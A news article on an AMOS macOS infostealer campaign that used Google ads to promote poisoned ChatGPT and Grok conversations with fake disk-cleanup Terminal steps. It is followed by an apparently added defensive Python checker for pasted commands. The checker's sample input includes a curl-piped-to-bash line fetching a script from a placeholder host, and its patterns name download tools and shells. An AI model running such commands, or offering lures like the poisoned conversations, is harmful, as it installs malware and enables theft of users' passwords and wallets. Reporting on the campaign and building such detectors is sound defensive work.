- AMOS operators used malvertising and poisoned ChatGPT/Grok conversations to deliver malware to Macs.
- Fake “free disk space” guides tricked users into running Terminal commands that installed AMOS.
- The campaign abused Google ads and trusted AI platforms, boosting the credibility and success of the infections.
AtomicOS (AMOS) criminals are combining malvertising with GenAI response poisoning to trick macOS users into downloading malware. That’s according to cybersecurity researchers at Huntress, who say they not only observed the attacks in the wild, but also replicated the same results as other victims.
In a blog post published earlier this week, Huntress said the AMOS operators first created two AI conversations: one with ChatGPT and one with Grok.
These conversations were about freeing up disk space on a macOS device and included instructions on how to do it. However, the instructions are fake: they ask the user to open the Terminal app and enter a command that downloads and runs the AMOS infostealer.
A variation of ClickFix
From there, they purchased advertising space on Google to promote these conversations. That way, when a user searched for something like “how to free up disk space on MacOS”, the poisoned conversations would be displayed at the very top of the search engine results page.
Apparently the trick worked, as Huntress was brought in to investigate a case of AMOS infection. For those who don’t know, AMOS is an infamous macOS information stealer, capable of stealing sensitive data, passwords, cryptocurrency wallet information, and much more.
The scam works similarly to ClickFix, another technique that tricks victims into executing Terminal commands. The only difference is that in this case, victims are proactively looking for a solution to a real problem rather than a non-existent one. What makes this campaign more dangerous is that it abuses not one, but three trusted services: Google’s search engine, ChatGPT, and Grok Answers.
Ultimately, both conversations are hosted on their respective platforms, increasing the perceived legitimacy of both sets of instructions. It is unclear, however, how the AMOS operators managed to get ChatGPT and Grok to display these results.
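A pasted Terminal command that downloads and runs code, as in the fake disk-cleanup instructions described above, has a shape that can be screened for before it is run or when reviewing shell history. The following is an added example, not code from Huntress or the original article. The article does not reproduce the actual command, so the matched shapes (a download piped into a shell, a shell running the output of a download, base64-decoded text piped into a shell) and the sample commands are assumptions, and the check covers more variants than the one the article mentions.

```python
import re
import shlex

FETCHERS = {"curl", "wget"}      # tools that pull remote content
SHELLS = {"sh", "bash", "zsh"}   # interpreters that execute what arrives on stdin
SUBST = re.compile(r"\$\(([^()]+)\)|`([^`]+)`")  # $(...) or `...`
# Constructed sample input, not commands taken from the campaign.
SAMPLES = ["curl -fsSL https://example.invalid/c.sh | bash", "du -sh ~/Library/Caches"]

def _pipelines(cmd):  # -> list of pipelines, each a list of argv lists
    lex = shlex.shlex(cmd, posix=True, punctuation_chars="|;&")
    lex.whitespace_split = True
    try:
        tokens = list(lex)
    except ValueError:           # unbalanced quotes: fall back to a plain split
        tokens = cmd.split()
    pipelines, stage = [[]], []
    for tok in tokens + [";"]:
        if tok in {"|", ";", "&", "&&", "||"}:
            if stage:
                pipelines[-1].append(stage)
            stage = []
            if tok != "|":       # anything but a pipe starts a new pipeline
                pipelines.append([])
        else:
            stage.append(tok)
    return [p for p in pipelines if p]

def _name(argv):  # command name without sudo/nohup or its directory
    rest = [a for a in argv if a not in ("sudo", "nohup")] or [""]
    return rest[0].rsplit("/", 1)[-1]

def findings(cmd):
    """Return the reasons a pasted command fetches or decodes text and runs it."""
    out = []
    for pipeline in _pipelines(cmd):
        remote = decoded = False
        for argv in pipeline:
            name = _name(argv)
            if name in FETCHERS:
                remote = True
            elif name == "base64" and {"-d", "-D", "--decode"} & set(argv):
                decoded = True
            elif name in SHELLS and (remote or decoded):
                out.append("pipe-to-shell: " + ("remote download" if remote else "base64-decoded text"))
            elif name in SHELLS | {"eval"}:
                inner = [(a or b).split() for a, b in SUBST.findall(" ".join(argv))]
                if any(_name(i) in FETCHERS for i in inner):
                    out.append("shell runs output of remote download")
    return out
```

A download that is only saved to disk, or an ordinary cleanup command such as the second sample, returns an empty list.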
Via Apple Insider